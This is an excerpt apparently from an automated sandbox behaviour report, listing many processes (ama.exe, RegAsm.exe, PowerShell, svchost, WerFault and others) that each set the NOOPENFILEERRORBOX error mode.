Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
